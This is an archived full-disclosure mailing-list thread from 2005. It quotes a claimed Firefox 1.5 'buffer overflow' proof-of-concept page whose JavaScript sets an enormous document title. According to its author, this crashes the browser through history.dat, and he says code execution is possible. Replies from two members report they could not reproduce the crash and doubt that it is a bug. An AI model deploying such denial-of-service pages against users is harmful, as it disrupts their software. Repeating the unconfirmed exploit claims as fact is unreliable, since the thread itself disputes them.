[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-disclosure] re: Firefox 1.5 buffer overflow (poc)
From: Ron <iago () valhallalegends ! com>
Date: 2005-12-08 16:19:59
Message-ID: 43985D2F.9040902 () valhallalegends ! com
[Download RAW message or body]
I was also unable to replicate it, on Firefox 1.5 i386 Linux EN
ad@heapoverflow.com wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> nor a fake , nor you really dont know what is a buffer overflow, but for
> sure here on my firefox 1.5 EN, the client is much longuer to load to
> the next boot but it reloads fine without exceptions and there is
> nothing about a security bug here...
>
>
>> <!-- Firefox 1.5 buffer overflow
>>
>> Basically firefox logs all kinda of URL data in it's history.dat file,
>> this little script will set a really large topic and Firefox will then
>> save that topic into it's history.dat.. The next time that firefox is
>> opened, it will instantly crash due to a buffer overflow -- this will
>> happen everytime until you manually delete the history.dat file -- >which
>> most users won't figure out.
>>
>> this proof of concept will only prevent someone from reopening
>> their browser after being exploited. DoS if you will. however, code
>> execution is possible with some modifcations.
>>
>> Tested with Firefox 1.5 on Windows XP SP2.
>>
>> ZIPLOCK <sickbeatz@gmail.com>
>>
>> -->
>> <html><head><title>heh</title><script type="text/javascript">
>> function ex() {
>> var buffer = "";
>> for (var i = 0; i < 5000; i++) {
>> buffer += "A";
>> }
>> var buffer2 = buffer;
>> for (i = 0; i < 500; i++) {
>> buffer2 += buffer;
>> }
>> document.title = buffer2;
>> }
>> </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
>> </a></body></html>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2 (MingW32)
>
> iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+
> 4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX
> Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v
> DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m
> /Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE
> crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22
> cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo
> pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3
> 5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi
> AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw
> 2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb
> IFxjTMn8Sc0=
> =SX09
> -----END PGP SIGNATURE-----
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic